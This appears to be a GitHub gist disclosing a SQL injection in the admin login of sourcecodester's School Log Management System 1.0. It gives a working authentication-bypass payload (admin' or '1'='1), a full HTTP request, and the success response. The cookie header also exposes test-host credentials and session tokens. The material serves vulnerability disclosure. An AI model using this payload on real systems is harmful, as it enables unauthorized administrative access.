Skip to content

Instantly share code, notes, and snippets.

@topsky979

topsky979/sourcecodester_School Log Management System_SQL_INJECTION_1.md Secret

Last active July 26, 2024 03:02
Show Gist options
  • Save topsky979/03c7fe20c80455b4884ae9e6c3f3d978 to your computer and use it in GitHub Desktop.
Save topsky979/03c7fe20c80455b4884ae9e6c3f3d978 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sourcecodester_School Log Management System_SQL_INJECTION_1.md

[description]

School Log Management System was discovered to contain a SQL Injection vulnerability via the URI /admin/ajax.php?action=login.

[Vulnerability Type]

SQL Injection

[Vendor of Product]

https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html

[Affected Product Code Base]

1.0

[Impact Escalation of Privileges]

true

[POC]
Use the following data as username,and any characters as password,you can login as well:

admin' or '1'='1
图片

Request :

POST /admin/ajax.php?action=login HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 40
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; layers=5; PHPSESSID=git91lpt9et0atu8q4dg73890i; vcodesum=12; BatchSelected=null; Path=/www/wwwroot/111.com/admin
Connection: keep-alive

username=admin'+or+'1'%3D'1&password=111

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 03:01:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1

1

Which '1' stands for success.Then you will be logged in the system. 图片

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment